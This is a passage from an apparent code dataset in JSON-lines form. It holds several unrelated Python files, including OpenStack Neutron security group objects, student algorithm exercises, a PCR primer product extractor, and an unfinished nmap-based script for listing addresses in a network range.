common_types\nfrom neutron_lib.utils import net as net_utils\nfrom oslo_utils import versionutils\nfrom oslo_versionedobjects import fields as obj_fields\nfrom sqlalchemy import or_\n\nfrom neutron.db.models import securitygroup as sg_models\nfrom neutron.db import rbac_db_models\nfrom neutron.objects import base\nfrom neutron.objects import ports\nfrom neutron.objects import rbac\nfrom neutron.objects import rbac_db\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroupRBAC(rbac.RBACBaseObject):\n # Version 1.0: Initial version\n # Version 1.1: Changed 'target_tenant' to 'target_project'\n VERSION = '1.1'\n\n db_model = rbac_db_models.SecurityGroupRBAC\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroup(rbac_db.NeutronRbacObject):\n # Version 1.0: Initial version\n # Version 1.1: Add RBAC support\n # Version 1.2: Added stateful support\n # Version 1.3: Added support for remote_address_group_id in rules\n # Version 1.4: Added support for normalized_cidr in rules\n # Version 1.5: Make the shared field nullable\n # Version 1.6: Added \"belongs_to_default_sg\" field in rules\n VERSION = '1.6'\n\n # required by RbacNeutronMetaclass\n rbac_db_cls = SecurityGroupRBAC\n db_model = sg_models.SecurityGroup\n\n fields = {\n 'id': common_types.UUIDField(),\n 'name': obj_fields.StringField(nullable=True),\n 'project_id': obj_fields.StringField(nullable=True),\n 'shared': obj_fields.BooleanField(nullable=True),\n 'stateful': obj_fields.BooleanField(default=True),\n 'is_default': obj_fields.BooleanField(default=False),\n 'rules': obj_fields.ListOfObjectsField(\n 'SecurityGroupRule', nullable=True\n ),\n # NOTE(ihrachys): we don't include source_rules that is present in the\n # model until we realize it's actually needed\n }\n\n fields_no_update = ['project_id', 'is_default']\n\n synthetic_fields = ['is_default', 'rules']\n\n extra_filter_names = {'is_default'}\n\n lazy_fields = set(['rules'])\n\n def create(self):\n # save is_default before super() resets it to False\n is_default = self.is_default\n with self.db_context_writer(self.obj_context):\n super(SecurityGroup, self).create()\n if is_default:\n default_group = DefaultSecurityGroup(\n self.obj_context,\n project_id=self.project_id,\n security_group_id=self.id)\n default_group.create()\n self.is_default = True\n self.obj_reset_changes(['is_default'])\n\n def from_db_object(self, db_obj):\n super(SecurityGroup, self).from_db_object(db_obj)\n if self._load_synthetic_fields:\n setattr(self, 'is_default',\n bool(db_obj.get('default_security_group')))\n self.obj_reset_changes(['is_default'])\n\n @classmethod\n def get_sg_by_id(cls, context, sg_id):\n return super(SecurityGroup, cls).get_object(context, id=sg_id)\n\n def obj_make_compatible(self, primitive, target_version):\n _target_version = versionutils.convert_version_to_tuple(target_version)\n\n def _filter_rules(rules, version):\n sg_rule = SecurityGroupRule()\n for rule in rules:\n r_version = versionutils.convert_version_to_tuple(\n rule['versioned_object.version'])\n if r_version > versionutils.convert_version_to_tuple(version):\n sg_rule.obj_make_compatible(\n rule['versioned_object.data'], version)\n rule['versioned_object.version'] = version\n\n if _target_version < (1, 1):\n primitive.pop('shared')\n if _target_version < (1, 2):\n primitive.pop('stateful')\n if _target_version < (1, 3):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.0')\n if _target_version < (1, 4):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.1')\n if _target_version < (1, 6):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.2')\n\n @classmethod\n def get_bound_project_ids(cls, context, obj_id):\n port_objs = ports.Port.get_objects(context,\n security_group_ids=[obj_id])\n return {port.project_id for port in port_objs}\n\n\n@base.NeutronObjectRegistry.register\nclass DefaultSecurityGroup(base.NeutronDbObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n db_model = sg_models.DefaultSecurityGroup\n\n fields = {\n 'project_id': obj_fields.StringField(),\n 'security_group_id': common_types.UUIDField(),\n }\n\n fields_no_update = ['security_group_id']\n\n primary_keys = ['project_id']\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroupRule(base.NeutronDbObject):\n # Version 1.0: Initial version\n # Version 1.1: Add remote address group support\n # Version 1.2: Added normalized cidr column\n # Version 1.3: Added belongs_to_default_sg column\n VERSION = '1.3'\n\n db_model = sg_models.SecurityGroupRule\n\n fields = {\n 'id': common_types.UUIDField(),\n 'project_id': obj_fields.StringField(nullable=True),\n 'security_group_id': common_types.UUIDField(),\n 'remote_group_id': common_types.UUIDField(nullable=True),\n 'direction': common_types.FlowDirectionEnumField(nullable=True),\n 'ethertype': common_types.EtherTypeEnumField(nullable=True),\n 'protocol': common_types.IpProtocolEnumField(nullable=True),\n 'port_range_min': common_types.PortRangeWith0Field(nullable=True),\n 'port_range_max': common_types.PortRangeWith0Field(nullable=True),\n 'remote_ip_prefix': common_types.IPNetworkField(nullable=True),\n 'remote_address_group_id': common_types.UUIDField(nullable=True),\n 'normalized_cidr': common_types.IPNetworkField(nullable=True),\n 'belongs_to_default_sg': obj_fields.BooleanField(default=False),\n }\n\n synthetic_fields = ['normalized_cidr',\n 'belongs_to_default_sg',\n ]\n\n foreign_keys = {'SecurityGroup': {'security_group_id': 'id'}}\n\n fields_no_update = ['project_id',\n 'security_group_id',\n 'remote_group_id',\n 'remote_address_group_id',\n 'belongs_to_default_sg',\n ]\n\n def obj_make_compatible(self, primitive, target_version):\n _target_version = versionutils.convert_version_to_tuple(target_version)\n if _target_version < (1, 1):\n primitive.pop('remote_address_group_id', None)\n if _target_version < (1, 2):\n primitive.pop('normalized_cidr', None)\n if _target_version < (1, 3):\n primitive.pop('belongs_to_default_sg', None)\n\n # TODO(sayalilunkad): get rid of it once we switch the db model to using\n # custom types.\n @classmethod\n def modify_fields_to_db(cls, fields):\n result = super(SecurityGroupRule, cls).modify_fields_to_db(fields)\n remote_ip_prefix = result.get('remote_ip_prefix')\n if remote_ip_prefix:\n result['remote_ip_prefix'] = cls.filter_to_str(remote_ip_prefix)\n return result\n\n def _load_normalized_cidr(self, db_obj=None):\n db_obj = db_obj or SecurityGroupRule.get_object(self.obj_context,\n id=self.id)\n if not db_obj:\n return\n\n cidr = None\n if db_obj.remote_ip_prefix:\n cidr = net_utils.AuthenticIPNetwork(db_obj.remote_ip_prefix).cidr\n\n setattr(self, 'normalized_cidr', cidr)\n self.obj_reset_changes(['normalized_cidr'])\n\n def from_db_object(self, db_obj):\n super(SecurityGroupRule, self).from_db_object(db_obj)\n self._load_normalized_cidr(db_obj)\n if self._load_synthetic_fields:\n setattr(self, 'belongs_to_default_sg',\n bool(db_obj.get('default_security_group')))\n self.obj_reset_changes(['belongs_to_default_sg'])\n\n def obj_load_attr(self, attrname):\n if attrname == 'normalized_cidr':\n return self._load_normalized_cidr()\n super(SecurityGroupRule, self).obj_load_attr(attrname)\n\n # TODO(sayalilunkad): get rid of it once we switch the db model to using\n # custom types.\n @classmethod\n def modify_fields_from_db(cls, db_obj):\n fields = super(SecurityGroupRule, cls).modify_fields_from_db(db_obj)\n if 'remote_ip_prefix' in fields:\n fields['remote_ip_prefix'] = (\n net_utils.AuthenticIPNetwork(fields['remote_ip_prefix']))\n return fields\n\n @classmethod\n def get_security_group_rule_ids(cls, project_id):\n \"\"\"Retrieve all SG rules related to this project_id\n\n This method returns the SG rule IDs that meet these conditions:\n - The rule belongs to this project_id\n - The rule belongs to a security group that belongs to the project_id\n \"\"\"\n context = context_lib.get_admin_context()\n # NOTE(ralonsoh): do no use a READER decorator in this method. Elevated\n # permissions are needed here.\n with db_api.CONTEXT_READER.using(context):\n query = context.session.query(cls.db_model.id)\n query = query.join(\n SecurityGroup.db_model,\n cls.db_model.security_group_id == SecurityGroup.db_model.id)\n clauses = or_(SecurityGroup.db_model.project_id == project_id,\n cls.db_model.project_id == project_id)\n rule_ids = query.filter(clauses).all()\n return [rule_id[0] for rule_id in rule_ids]\n","repo_name":"openstack/neutron","sub_path":"neutron/objects/securitygroup.py","file_name":"securitygroup.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"13830300569","text":"from simple_perceptron import Perceptron\nfrom support_vector_machine import SVM\nimport random\n\ndef random_point():\n '''\n Returns a random 2-dimensional vector of floats between -1 and +1\n '''\n return [random.uniform(-1., 1.), random.uniform(-1., 1.)]\n\ndef generate_line():\n '''\n Randomly generates a line from 2 random points in [-1,1]x[-1,1]\n and returns the tuple (m, q, inv) for y = mx + q with inv a boolean which decides what side of the line maps to +1\n (ignores vertical lines)\n '''\n while (True):\n pointA = random_point()\n pointB = random_point()\n if ((pointB[0] - pointA[0]) != 0):\n break\n\n m = (pointB[1] - pointA[1]) / (pointB[0] - pointA[0])\n q = pointA[1] - m*pointA[0]\n inv = bool(random.getrandbits(1))\n return (m, q, inv)\n\ndef compute_f(line, point):\n '''\n Takes an (m, q, inv) tuple representing a line and takes a point, computes f(x)\n Returns 1 if the point is over the line, returns -1 if it's under it\n '''\n if (point[1] >= (line[0]*point[0] + line[1])):\n if (line[2]):\n return 1\n else:\n return -1\n else:\n if (line[2]):\n return -1\n else:\n return 1\n\n\ndef generate_dataset(line, n):\n '''\n Takes an (m, q, inv) tuple representing a line and n=total number of datapoints to generate\n Returns a length n list of tuples (x, y) with x a random vector and y=f(x)\n '''\n data = []\n for c in range(n):\n x = random_point()\n y = compute_f(line, x)\n data.append((x, y))\n\n return data\n\ndef experiment(n):\n s = SVM(2)\n p = Perceptron(2)\n tot_better = 0\n tot_sv = 0\n for run in range(1000):\n line = generate_line()\n data = []\n alleq = True\n while alleq:\n data = generate_dataset(line, n)\n prevy = data[0][1]\n for i in range(1, len(data)):\n if data[i][1]==prevy:\n alleq = False\n break\n prevy = data[i][1]\n s.reset(data)\n p.reset(data)\n s.solve()\n tot_sv += len(s.suppvectors)\n p.train()\n new_data = generate_dataset(line, n*5)\n if p.f_disagreement(new_data) > s.classification_error(new_data):\n tot_better += 1\n perc_better = tot_better/1000\n avg_sv = tot_sv / 1000\n return (perc_better, avg_sv)\n\n#print(experiment(10))\nprint(experiment(100))\n","repo_name":"elvisnava/machine-learning","sub_path":"support_vector_machine_test.py","file_name":"support_vector_machine_test.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15186897159","text":"import heapq\r\nN = int(input())\r\nAB = [[int(_) for _ in input().split()] for _ in range(N - 1)]\r\nG = {}\r\nfor a, b in AB:\r\n a -= 1\r\n b -= 1\r\n #0-indexed\r\n G[a] = G.get(a, set())\r\n G[b] = G.get(b, set())\r\n G[a].add(b)\r\n G[b].add(a)\r\n\r\n\r\ndef dijkstra_stack(i):\r\n D = [-1] * N\r\n D[i] = 0\r\n stack = [i]\r\n while True:\r\n i = stack.pop(0)\r\n update = False\r\n for j in G[i]:\r\n if D[j] == -1:\r\n update = True\r\n D[j] = D[i] + 1\r\n stack += [j]\r\n if not stack:\r\n break\r\n return D\r\n\r\n\r\nD_Fennec = dijkstra_stack(0)\r\nD_Snuke = dijkstra_stack(N - 1)\r\n\r\nf = 0\r\ns = 0\r\nfor i in range(N):\r\n if D_Fennec[i] <= D_Snuke[i]:\r\n f += 1\r\n else:\r\n s += 1\r\nif f > s:\r\n print('Fennec')\r\nelse:\r\n print('Snuke')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc078/B/3961686.py","file_name":"3961686.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"28965730825","text":"# Aufgabenteil a)\ndef is_sorted(L):\n\t'''Kontrolliert ob eine Liste sortiert ist, für ansteigend sortierte Listen wird 1 zurüch gegeben, für absteigend sortierted Listen -1, für unsortierte 0 und für Listen mit gleichem Element None.'''\n\tsort = None\n\ti = 0\n\twhile sort == None and i+1 < len(L):\n\t\tif L[i] < L[i+1]: \n\t\t\t#Liste ist nicht absteigend\n\t\t\tsort = 1\n\t\telif L[i] > L[i+1]: \n\t\t\t#Liste ist nicht aufsteigend\n\t\t\tsort = -1 \n\t\ti += 1\n\twhile sort == 1 and i+1 < len(L):\n\t\tif L[i] > L[i+1]: \n\t\t\t#Liste ist weder auf- noch absteigend\n\t\t\tsort = 0\n\t\ti += 1\n\twhile sort == -1 and i+1 < len(L):\n\t\tif L[i] < L[i+1]: \n\t\t\t#Liste ist weder ab- noch aufsteigend\n\t\t\tsort = 0\n\t\ti += 1\n\treturn sort\n\n# Tests\nL1 = [1,2,3,4,5]\nL2 = [5,4,3,2,1]\nL3 = [5,4,3,1,2]\nL4 = [1,2,3,5,4]\nL5 = [0,0]\nfor L in [L1,L2,L3,L4,L5]:\n\tprint(is_sorted(L))\nprint()\n\n# Aufgabenteil b)\nfrom random import randint\ndef generate_random_list(a=0,b=99,n=50):\n\t'''Generiert eine Liste der Länge n mit ganzen Zufallszahlen im Bereich zwischen a und b.'''\n\treturn [ randint(a,b) for i in range(n) ]\n\n# Aufgabenteil c)\ndef bubble_sort(L,lo,up):\n\t'''Sortiert den abschnitt zwischen lo und up der gegebene Liste L mit Bubble-Sort.'''\n\tremain_up = up-1\n\tdone = False\n\twhile not done:\n\t\tdone = True\n\t\tfor i in range(lo,remain_up):\n\t\t\tif L[i] > L[i+1]:\n\t\t\t\tdone = False\n\t\t\t\tL[i], L[i+1] = L[i+1], L[i]\n\t\tremain_up -= 1\n\ndef merge(L,H,lo,up,mid):\n\t'''Merged die beiden Listenabschnitte von L zwischen lo-mid und mid-up in der Hilfsliste H.'''\n\ti = lo\n\tj = mid\n\tfor k in range(lo,up):\n\t\tif i < mid and j < up:\n\t\t\tif L[i] <= L[j]:\n\t\t\t\tH[k] = L[i]\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tH[k] = L[j]\n\t\t\t\tj += 1\n\t\telif i < mid:\n\t\t\tH[k] = L[i]\n\t\t\ti += 1\n\t\telif j < up:\n\t\t\tH[k] = L[j]\n\t\t\tj += 1\n\ndef merge_sort(L,H,lo,up,length,threshold=9):\n\t'''Sortiert die Liste L zwischen up und lo. Dabei wird die Hilfsliste H verwendet und die Liste wird an der Stelle lo+length geteilt. Up threshold wird Bubble-Sort verwendet.'''\n\tif length <= threshold:\n\t\t# print(\"SORTING:\\nlength: %s, lo: %s, up: %s\" % (length,lo,up))\n\t\t# print(\" L: %s \\n ->\" % (L) )\n\t\tbubble_sort(L,lo,up)\n\t\t# print(\" L: %s \\n\" % (L) )\n\telse:\n\t\tmid = lo+length\n\t\tL = merge_sort(L,H,lo,mid,length//2,threshold) #rekursiv die erste Hälfte sortieren\n\t\tL = merge_sort(L,H,mid,up,length//2,threshold) #rekursiv die zweite Hälfte sortieren\n\t\t# print(\"MERGING:\\nlength: %s, lo: %s, up: %s, mid: %s\" % (length,lo,up,mid))\n\t\t# print(\" L: %s \\n H: %s \\n ->\" % (L,H) )\n\t\tmerge(L,H,lo,up,mid)\n\t\t# print(\" H: %s \\n\" % (H) )\n\t\tL = H[:] #L updaten\n\treturn L\n\ndef merge_sort_init(L,threshold=9):\n\t'''Sortiert die Liste L mit Mergesort. Optional, kann angegeben werden, ab welchem threshold Bubble-Sort benutzt werden soll.'''\n\tif len(L) < threshold:\n\t\tbubble_sort(L,0,len(L))\n\telse:\n\t\tH = L[:]\n\t\tlength = len(L)//2 #gibt die Länge der zu mergenden Listen an\n\t\tL = merge_sort(L,H,0,len(L),length,threshold)\n\treturn L\n\n# Tests\nfor i in range(10):\n\tL = generate_random_list(0,20,16)\n\tL = merge_sort_init(L)\n\t# L = [16, 14, 6, 5, 1, 7, 10, 4, 15, 9, 2, 12, 11, 13, 3, 8] \n\t# L = merge_sort_init(L,2)\n\tif is_sorted(L) == 1: print(\"Eine Liste wurde erfolgreich sortiert\")\n\telse: print(\"!!! ERROR !!!\")\nprint()\n\n# Aufgabenteil d\n\ndef merge_sort(L,threshold=9):\n\t'''Sortiert die Liste L mit Mergesort. Optional, kann angegeben werden, ab welchem threshold Bubble-Sort benutzt werden soll.'''\n\tlen_L = len(L)\n\tsize = min(threshold,len_L)\n\t#sortiere die Teillisten\n\tfor lo in [i*size for i in range(round(len_L/size+.5))]:\n\t\tup = min(lo+size,len_L)\n\t\t# print(\"SORTING:\\nlength: %s, lo: %s, up: %s\" % (size,lo,up))\n\t\t# print(\" L: %s \\n ->\" % (L) )\n\t\tbubble_sort(L,lo,up)\n\t\t# print(\" L: %s \\n\" % (L) )\n\t#merge die Teillisten\n\twhile size < len_L:\n\t\tH = L[:] #H updaten\n\t\tfor lo in [i*2*size for i in range(round(len_L/(2*size)+.5))]:\n\t\t\tmid = lo+size\n\t\t\tup = min(lo+2*size,len_L)\n\t\t\t# print(\"MERGING:\\nlength: %s, lo: %s, up: %s, mid: %s\" % (size,lo,up,mid))\n\t\t\t# print(\" L: %s \\n H: %s \\n ->\" % (L,H) )\n\t\t\tmerge(L,H,lo,up,mid)\n\t\t\t# print(\" H: %s \\n\" % (H) )\n\t\t\tL = H[:] #L updaten\n\t\tsize *= 2\n\treturn L\n\n# Tests\nfor i in range(10):\n\tL = generate_random_list(0,20,16)\n\tL = merge_sort(L)\n\t# L = [16, 14, 6, 5, 1, 7, 10, 4, 15, 9, 2, 12, 11, 13, 3, 8] \n\t# L = merge_sort(L,2)\n\tif is_sorted(L) == 1: print(\"Eine Liste wurde erfolgreich sortiert\")\n\telse: print(\"!!! ERROR !!!\")\n","repo_name":"MrLoh/ALP2-Uebungen","sub_path":"U04/A1 - mergesort.py","file_name":"A1 - mergesort.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28087615388","text":"from rest_framework.serializers import ModelSerializer\nfrom sample_app.models import SampleModel\n\n\nclass SampleModelSerializer(ModelSerializer):\n\n def create(self, validated_data):\n instance, _ = SampleModel.objects.get_or_create(**validated_data)\n return instance\n\n class Meta:\n model = SampleModel\n fields = '__all__'\n","repo_name":"Arkiralor/Articles","sub_path":"src/sample_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24388004497","text":"from enum import Enum\r\nfrom typing import Any, Callable\r\nfrom typing import Optional\r\nfrom typing import Dict, List\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nclass EdgeType(Enum):\r\n directed = 1\r\n undirected = 2\r\n\r\nclass Vertex:\r\n def __init__(self, data):\r\n self.data = data\r\n\r\n data: Any\r\n index: int\r\n\r\nclass Edge:\r\n source: Vertex\r\n destination: Vertex\r\n weight: Optional[float]\r\n\r\nclass Graph:\r\n adjacencies: Dict[Vertex, List[Edge]]\r\n\r\n def __init__(self, adjacencies):\r\n self.adjacencies = adjacencies\r\n\r\n def create_vertex(self, data: Any) -> Vertex:\r\n cortex = Vertex(data)\r\n self.adjacencies.update({cortex: []})\r\n return cortex\r\n\r\n def add_directed_edge(self, source: Vertex, destination: Vertex, weight: Optional[float] = None) -> None:\r\n sc = Edge()\r\n sc.source = source\r\n sc.destination = destination\r\n sc_graf = self.adjacencies.get(source)\r\n sc_graf.append(sc)\r\n\r\n def add_undirected_edge(self, edge: EdgeType, source: Vertex, destination: Vertex,\r\n weight: Optional[float] = None) -> None:\r\n self.add_directed_edge(source, destination)\r\n self.add_directed_edge(destination, source)\r\n\r\n def add(self, edge: EdgeType, source: Vertex, destination: Vertex, weight: Optional[float] = None) -> None:\r\n if edge == 1:\r\n self.add_directed_edge(source, destination)\r\n\r\n if edge == 2:\r\n self.add_undirected_edge(source, destination)\r\n\r\n def traverse_breadth_first(self, visit: Callable[[Any], None]) -> None:\r\n pass\r\n\r\n def traverse_depth_first(self, visit: Callable[[Any], None]) -> None:\r\n pass\r\n\r\n def show(self):\r\n G = nx.DiGraph()\r\n for x in self.adjacencies.values():\r\n for y in x:\r\n G.add_edge(y.source.data, y.destination.data)\r\n nx.draw(G, with_labels=True)\r\n plt.show()\r\n\r\n def print(self):\r\n for x in self.adjacencies.values():\r\n for y in x:\r\n print(y.source.data, \"----->\", y.destination.data)\r\n\r\ndef dead_path(g: Graph, cross_id: Any) -> Optional[List[Vertex]]:\r\n lista = []\r\n start = cross_id\r\n check = 0\r\n\r\n def fondue(a, lista, check):\r\n if check != 0:\r\n if a == start:\r\n return print(lista)\r\n check += 1\r\n\r\n for x in g.adjacencies.values():\r\n if x != []:\r\n for y in x:\r\n if a == y.source.data:\r\n lista.append(a)\r\n fondue(y.destination.data, lista, check)\r\n else:\r\n return None\r\n\r\n return fondue(cross_id, lista, check)\r\n\r\nslownik = {}\r\nslownik2 = {}\r\nslownik3 = {}\r\nGraf1 = Graph(slownik)\r\nGraf2 = Graph(slownik2)\r\nGraf3 = Graph(slownik3)\r\n\r\nvrt1 = Graf1.create_vertex(1)\r\nvrt9 = Graf1.create_vertex(9)\r\nvrt4 = Graf1.create_vertex(4)\r\nvrt6 = Graf1.create_vertex(6)\r\nGraf1.add_directed_edge(vrt1, vrt9)\r\nGraf1.add_directed_edge(vrt9, vrt4)\r\nGraf1.add_directed_edge(vrt4, vrt6)\r\nGraf1.add_directed_edge(vrt6, vrt1)\r\n\r\nvrtt45 = Graf2.create_vertex(45)\r\nvrtt99 = Graf2.create_vertex(99)\r\nvrtt3 = Graf2.create_vertex(3)\r\nvrtt0 = Graf2.create_vertex(0)\r\nGraf2.add_directed_edge(vrtt45, vrtt99)\r\nGraf2.add_directed_edge(vrtt99, vrtt3)\r\nGraf2.add_directed_edge(vrtt3, vrtt0)\r\n\r\nvrttt1 = Graf3.create_vertex(1)\r\nvrttt2 = Graf3.create_vertex(2)\r\nvrttt3 = Graf3.create_vertex(3)\r\nvrttt4 = Graf3.create_vertex(4)\r\nvrttt5 = Graf3.create_vertex(5)\r\nGraf3.add_directed_edge(vrttt1, vrttt2)\r\nGraf3.add_directed_edge(vrttt2, vrttt5)\r\nGraf3.add_directed_edge(vrttt2, vrttt3)\r\nGraf3.add_directed_edge(vrttt3, vrttt4)\r\nGraf3.add_directed_edge(vrttt4, vrttt1)\r\n\r\nprint(\"---------Graf 1-----------\")\r\nGraf1.show()\r\nGraf1.print()\r\nprint(\"---------Graf 2-----------\")\r\nGraf2.show()\r\nGraf2.print()\r\nprint(\"---------Graf 3-----------\")\r\nGraf3.show()\r\nGraf3.print()\r\nprint(\"-------Tablica 1----------\")\r\ndead_path(Graf1, 9)\r\nprint(\"-------Tablica 2----------\")\r\ndead_path(Graf2, 45)\r\nprint(\"-------Tablica 3----------\")\r\ndead_path(Graf3, 1)","repo_name":"Szymek13/AlgorystmyIStrukturyDanych","sub_path":"Projekt 3.py","file_name":"Projekt 3.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9425110837","text":"import numpy as np\n\ndef batch_postprocess_images(img, batch_w, batch_h):\n b, ch, w, h = img.shape\n img = img.reshape((batch_w, batch_h, ch, w, h))\n img = img.transpose(0,1,3,4,2)\n img = (img + 1) *127.5\n img = np.clip(img, 0, 255)\n img = img.astype(np.uint8)\n img = img.reshape((batch_w, batch_h, w, h, ch)).transpose(0,2,1,3,4).reshape((w*batch_w, h*batch_h, ch))\n return img\n\n","repo_name":"SeitaroShinagawa/chainer-partial_convolution_image_inpainting","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"72"} +{"seq_id":"9731063548","text":"import pandas as pd\nimport numpy as np \nimport time\nimport argparse\nimport os\nimport re\nimport sys\nimport subprocess \nimport traceback\nfrom Bio import SeqIO, Entrez \nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n# How to run: \n# python3 -m venv ~/my_venv\n# source ~/my_venv/bin/activate\n# pip install pandas numpy biopython argparse\n# python3 process1.py fasta_file primer_file \n\ndef extract_products(input_file, primer_file):\n df = pd.read_csv(primer_file)\n\n # Create lists of unique forward and reverse primers \n F_primers = list(set(df['F_truseq']))\n R_primers = list(set(df['R_truseq']))\n\n # Create lists of reverse complements of each primer \n F_reverse_complement = [str(Seq(primer).reverse_complement()) for primer in F_primers]\n R_reverse_complement = [str(Seq(primer).reverse_complement()) for primer in R_primers]\n\n # Start time tracking \n start_time = time.time()\n\n # Create empty dictionary to store results \n record_sequences = {}\n\n # Open the input file and parse it as a fasta file \n with open(input_file, 'r') as handle:\n records = SeqIO.parse(handle, 'fasta')\n\n # Loop through ea record \n for record in records:\n sequence = str(record.seq)\n # Create a list to store the position of ea primer in the sequence\n primers_positions = [] \n\n # For ea primer, find all positions in the sequence where the primer can be found \n for primer in F_primers + R_primers + F_reverse_complement + R_reverse_complement:\n for match in re.finditer(primer, sequence):\n pos = match.start() # Start position of the match\n # Append a tuple with the primer and its position to list \n primers_positions.append((primer, pos))\n\n # If there are at least 2 primer positions found \n if len(primers_positions) >= 2:\n record_id = record.id # Find the ID of the record\n # Sort the list nof primers and positions by postions \n primers_positions.sort(key=lambda x: x[1])\n\n # Create a list to store info for ea seq that was found \n sequence_info = []\n\n # For ea pair of primers \n for i in range(len(primers_positions) - 1):\n for j in range(i + 1, len(primers_positions)):\n # Extract the start and end primer and their pos\n start_primer, start_pos = primers_positions[i]\n end_primer, end_pos = primers_positions[j]\n \n # Extract the product seq btw the start and end primers\n product = sequence[start_pos:end_pos + len(end_primer)]\n \n # Caculate legnth of product \n length = len(product)\n combination = f\"{start_primer}-{end_primer}\"\n \n # Find source of ea primer \n start_primer_source = None\n end_primer_source = None\n\n if start_primer in F_primers:\n start_primer_source = \"F_primers\"\n elif start_primer in R_primers:\n start_primer_source = \"R_primers\"\n elif start_primer in F_reverse_complement:\n start_primer_source = \"F_reverse_complement\"\n elif start_primer in R_reverse_complement:\n start_primer_source = \"R_reverse_complement\"\n\n if end_primer in F_primers:\n end_primer_source = \"F_primers\"\n elif end_primer in R_primers:\n end_primer_source = \"R_primers\"\n elif end_primer in F_reverse_complement:\n end_primer_source = \"F_reverse_complement\"\n elif end_primer in R_reverse_complement:\n end_primer_source = \"R_reverse_complement\"\n\n info = {\n 'Start Primer': start_primer,\n 'End Primer': end_primer,\n 'Start Position': start_pos,\n 'End Position': end_pos + len(end_primer),\n 'Length': length,\n 'Combination': f\"{start_primer_source}-{end_primer_source}\",\n 'Product': product,\n }\n sequence_info.append(info)\n\n # Add the info for ea record to the record_sequences dictionary\n record_sequences[record_id] = sequence_info\n\n # End the time tracking \n end_time = time.time()\n\n # Print out the total execution time \n print(\"Total Execution Time:\", end_time - start_time)\n\n return record_sequences\n\ndef main(input_file, primer_file):\n # Extract products using the input file and primer file \n record_sequences = extract_products(input_file, primer_file)\n \n # Create a list to store the result dictionaries \n results = []\n\n # For ea record in the record sequences dictionary \n for record_id, sequence_info in record_sequences.items():\n for info in sequence_info:\n # Create result dictionary and add it to the results list \n result = {\n \"Record ID\": record_id,\n \"Start Primer\": info[\"Start Primer\"],\n \"End Primer\": info[\"End Primer\"],\n \"Start Position\": info[\"Start Position\"],\n \"End Position\": info[\"End Position\"],\n \"Length\": info[\"Length\"],\n \"Combination\": info[\"Combination\"],\n \"Product\": info[\"Product\"],\n }\n results.append(result)\n\n # Convert the results list to df \n df = pd.DataFrame(results)\n\n # If result file already exists, append results to it, otherwise create a new file with header \n if os.path.isfile('raw_results.csv'):\n df.to_csv('raw_results.csv', mode='a', header=False, index=False)\n else:\n df.to_csv('raw_results.csv', index=False)\n\n# Call main functon \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file', type=str)\n parser.add_argument('primer_file', type=str)\n args = parser.parse_args()\n input_file = args.input_file\n primer_file = args.primer_file\n\n main(input_file, primer_file)","repo_name":"lisatran251/BINF_6999","sub_path":"process1.py","file_name":"process1.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"993093505","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n The final goal is finding free addresses in a network range\n Not finished but you may see how it looks like\n\"\"\"\n\nimport sys\nimport subprocess\n\n\"\"\"\n execthis()\n a function that runs an arbitrary command with its args\n and returns the contents of the standard output in case of success\n or the error text in case of disaster\n\"\"\"\n\n\ndef execthis(cmdargs, pattern):\n\n \"\"\" create a subprocess \"p\" and pipe stdout and stderr\n \"\"\"\n\n p = subprocess.run(cmdargs, stdin=None, stdout=subprocess.PIPE,\n input=None, stderr=subprocess.PIPE,\n shell=False, timeout=None, check=False, universal_newlines=True)\n\n \"\"\" get the result of the execution (much like \"$?\" in bash) and add it to the \"output\" list\n \"\"\"\n\n rc = p.returncode\n rv = []\n\n \"\"\" in case of success, the subprocess returns zero, so \"not rc\" is true\n and flow goes through the \"if\"; in case of error will run the \"else\"\n \"\"\"\n\n if not rc:\n for item, line in enumerate(p.stdout.split(\"\\n\")):\n if pattern in line:\n words = line.split(\" \")\n rv.append(words[len(words) - 1])\n else:\n for item, line in enumerate(p.stderr.split(\"\\n\")):\n rv.append(line)\n\n return rc, rv\n\n\n\"\"\"\n HERE it comes the very very true stuff\n\"\"\"\n\nif __name__ == \"__main__\":\n\n myself = sys.argv[0]\n print(\"Started {}...\".format(myself))\n rc = 0\n\n for index, item in enumerate(sys.argv[1:]):\n\n \"\"\" we plan to execute nmap to build the range of addresses.\n check it's installed in your system\n \"\"\"\n\n cmdargs = [\"nmap\", \"-sL\", \"-n\", str(item)]\n rc, rv = execthis(cmdargs, \"Nmap scan report for\")\n\n \"\"\" now check nmap's return code\n \"\"\"\n\n if rc:\n print(\"ARGH! Rc is {:04d}\".format(rc))\n\n \"\"\" print the address list in case of success, or the stderr contents if something 